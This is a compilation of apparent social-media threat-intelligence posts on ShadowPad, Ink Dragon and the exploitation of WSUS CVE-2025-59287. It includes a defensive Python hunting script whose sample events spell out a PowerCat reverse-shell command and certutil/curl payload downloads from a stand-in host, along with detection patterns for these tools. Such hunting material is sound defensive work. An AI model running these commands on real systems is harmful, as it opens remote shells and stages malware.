DKnife – a new cyber threat in routers changes the rules of network security

Is your router just a boring Wi-Fi box? DKnife shows it can be the perfect listening post, right at the door of your network.

Read more:
https://pressmind.org/dknife-nowy-cyberzagrozenie-w-routerach-zmienia-zasady-bezpieczenstwa-sieci/

#PressMindLabs #aitm #darknimbus #dknife #routery #shadowpad

#CheckPoint Research revealed a sophisticated wave of attacks attributed to the Chinese #threat actor #InkDragon, which targets European governments while continuing campaigns in Southeast Asia and South America. The threat actor converts compromised #IIS servers into relay nodes with #ShadowPad, exploits predictable configuration keys for access, and deploys a new #FinalDraft #backdoor for exfiltration and lateral movement.

https://research.checkpoint.com/2025/ink-dragons-relay-network-and-offensive-operation/

Ink Dragon's Relay Network and Stealthy Offensive Operation

Check Point Research tracks a sustained, highly capable espionage cluster, which we refer to as Ink Dragon, and which is referenced in other reports as CL-STA-0049, Earth Alux, or REF7707. This cluster is assessed by several vendors to be PRC-aligned. Since at least early 2023, Ink Dragon has repeatedly targeted government, telecom, and […]

Check Point Research
Inside Ink Dragon: Revealing the Relay Network and Inner Workings of a Stealthy Offensive Operation
#InkDragon #ShadowPad #CDBLoader #LalsDumper #FINALDRAFT
https://research.checkpoint.com/2025/ink-dragons-relay-network-and-offensive-operation/

📰 ShadowPad Backdoor Deployed via Critical WSUS Server Vulnerability

🔥 CRITICAL: Chinese APTs are actively exploiting a WSUS RCE vulnerability (CVE-2025-59287) to deploy the ShadowPad backdoor. Attackers gain SYSTEM access for espionage. Patching is urgent! #ThreatIntel #CVE #ShadowPad #CyberAttack

🔗 https://cyber.netsecops.io/articles/shadowpad-backdoor-deployed-exploiting-windows-server-vulnerability/?utm_source=mastodon&utm_medium=social&utm_campaign=twitter_auto

ShadowPad Backdoor Deployed via Critical WSUS Server Vulnerability

Chinese state-sponsored APTs are actively exploiting a critical RCE vulnerability (CVE-2025-59287) in Microsoft WSUS to deploy the ShadowPad backdoor for espionage. Patching is critical.

CyberNetSec.io
Analysis of ShadowPad Attack Exploiting WSUS Remote Code Execution Vulnerability (CVE-2025-59287)
#CVE_2025_59287 #ShadowPad
https://asec.ahnlab.com/en/91166/
Analysis of ShadowPad Attack Exploiting WSUS Remote Code Execution Vulnerability (CVE-2025-59287) - ASEC

ASEC
Attackers deliver ShadowPad via newly patched WSUS RCE bug

Attackers exploited a patched WSUS flaw (CVE-2025-59287) to gain access, use PowerCat for a shell, and deploy the ShadowPad malware.

Security Affairs

Threat actors are actively exploiting CVE-2025-59287 in WSUS to deploy ShadowPad.

ASEC notes the attackers used PowerCat for shell access, then fetched and installed ShadowPad with certutil/curl, executing it through DLL side-loading.

How are you securing WSUS or other update infrastructure in your environment?
💬 Share your insights
⭐ Follow TechNadu for timely threat intel

#infosec #WSUS #ShadowPad #CVE2025 #malware #threatintel #sysadmin #DFIR #TechNadu
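The delivery chain summarized in the post above (a PowerCat shell, ShadowPad fetched with certutil/curl, then executed through DLL side-loading) maps cleanly onto a hunt over process-creation telemetry. The following is an added example, not code from ASEC, TechNadu, or any vendor: the event schema, field names, host names, TEST-NET addresses, file paths, and the sample events are all constructed for the demonstration. The side-loading heuristic is an assumption, since the posts do not name the side-loading host binary: it flags any process launched from a directory on the same host where a LOLBin download landed earlier.

```python
"""Hunt for the PowerCat -> certutil/curl download -> execute-from-drop-dir chain
in process-creation events.  Added example; schema and sample data are constructed."""
import re
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:           # constructed schema, not a real EDR/Sysmon format
    ts: int
    host: str
    image: str             # full path of the started process
    cmdline: str


URL = re.compile(r"https?://\S+", re.I)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def dirname(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[0].lower()


def download_target(ev: ProcEvent):
    """Return the local file a certutil/curl download writes, or None."""
    name = basename(ev.image)
    toks = ev.cmdline.split()
    low = [t.lower() for t in toks]
    if name == "certutil.exe" and "-urlcache" in low and URL.search(ev.cmdline):
        # certutil -urlcache [-split] -f <url> <outfile>: the output file is the last token
        return toks[-1]
    if name == "curl.exe" and URL.search(ev.cmdline):
        for i, t in enumerate(low):
            if t in ("-o", "--output") and i + 1 < len(toks):
                return toks[i + 1]
    return None  # curl without -o (e.g. a plain GET) is not a file drop


def is_powercat(ev: ProcEvent) -> bool:
    """PowerCat is a PowerShell script; its name in the command line is the tell."""
    return basename(ev.image) in ("powershell.exe", "pwsh.exe") and "powercat" in ev.cmdline.lower()


def hunt(events):
    """Return (ts, host, finding, detail) tuples in time order."""
    staged = defaultdict(set)   # host -> directories where LOLBin downloads landed
    findings = []
    for ev in sorted(events, key=lambda e: e.ts):
        if is_powercat(ev):
            findings.append((ev.ts, ev.host, "powercat_shell", ev.cmdline))
        tgt = download_target(ev)
        if tgt:
            staged[ev.host].add(dirname(tgt))
            findings.append((ev.ts, ev.host, "lolbin_download", tgt))
        elif dirname(ev.image) in staged[ev.host]:
            # Assumed side-loading signal: a binary launched from the drop directory.
            findings.append((ev.ts, ev.host, "exec_from_staging_dir", ev.image))
    return findings


# Constructed sample events (TEST-NET-3 address, fictitious paths).
SAMPLE = [
    ProcEvent(1, "wsus01", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -nop -w hidden -c powercat -c 203.0.113.10 -p 443 -e cmd"),
    ProcEvent(2, "wsus01", r"C:\Windows\System32\certutil.exe",
              r"certutil.exe -urlcache -split -f http://203.0.113.10/a.zip C:\ProgramData\Upd\a.zip"),
    ProcEvent(3, "wsus01", r"C:\Windows\System32\curl.exe",
              r"curl.exe -s http://203.0.113.10/b.dll -o C:\ProgramData\Upd\b.dll"),
    ProcEvent(4, "wsus01", r"C:\ProgramData\Upd\host.exe", "host.exe"),
    ProcEvent(5, "wsus01", r"C:\Windows\System32\svchost.exe", "svchost.exe -k netsvcs"),
    ProcEvent(6, "fs02", r"C:\Windows\System32\curl.exe", "curl.exe https://example.com"),
]

if __name__ == "__main__":
    for ts, host, kind, detail in hunt(SAMPLE):
        print(f"{ts:>3} {host:8} {kind:24} {detail}")
```

Run stand-alone it prints four findings for wsus01 and nothing for fs02, whose curl call has no output file; correlating the drop directory with later execution is what separates the side-loading step from ordinary admin use of curl or certutil.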

ToolShell Used to Compromise Telecoms Company in Middle East

China-based threat actors also compromised networks of government agencies in countries in Africa and South America.

Good day everyone!

This is a really interesting read from SentinelOne Labs. Back in October 2024 they dealt with a reconnaissance operation that was related to the activity cluster tracked as #PurpleHaze and then in 2025 "they helped disrupt an intrusion linked to a wider #ShadowPad operation". The activity was attributed to China-nexus threat actors.

The article gives an in-depth view of what it looks like when an organization that is responsible for "IT services and logistics" gets compromised, which we could call a supply-chain attack. The article also provides a TON of technical details about the tools and infrastructure that were used, indicators of compromise to scan for in your environment, and behaviors and commands that were observed throughout. This one may take a while to read, but it's worth it! Thanks to the researchers Dr Aleksandar Milenkoski and Tom Hegel for this report! I hope you all enjoy it as much as I did. Happy Hunting!

Follow the Smoke | China-nexus Threat Actors Hammer At the Doors of Top Tier Targets
https://www.sentinelone.com/labs/follow-the-smoke-china-nexus-threat-actors-hammer-at-the-doors-of-top-tier-targets/

Intel 471 Cyborg Security, Now Part of Intel 471 #ThreatIntel #ThreatHunting #ThreatDetection #HappyHunting #readoftheday

Follow the Smoke | China-nexus Threat Actors Hammer At the Doors of Top Tier Targets

This report uncovers a set of related threat clusters linked to PurpleHaze and ShadowPad operators targeting organizations, including cybersecurity vendors.

SentinelOne
Chinese spy crew appears to be preparing for conflict by backdooring 75+ critical orgs
#SentinelOne discovered the campaign when they tried to hit the #security vendor's own servers
In their report, they describe a series of intrusions between July 2024 and March 2025 involving #ShadowPad #malware and post-exploitation espionage activity that SentinelOne has dubbed "#PurpleHaze", publicly reported as #APT15 and #UNC5174, and they're blaming #China.
https://www.theregister.com/2025/06/09/china_malware_flip_switch_sentinelone/

The Register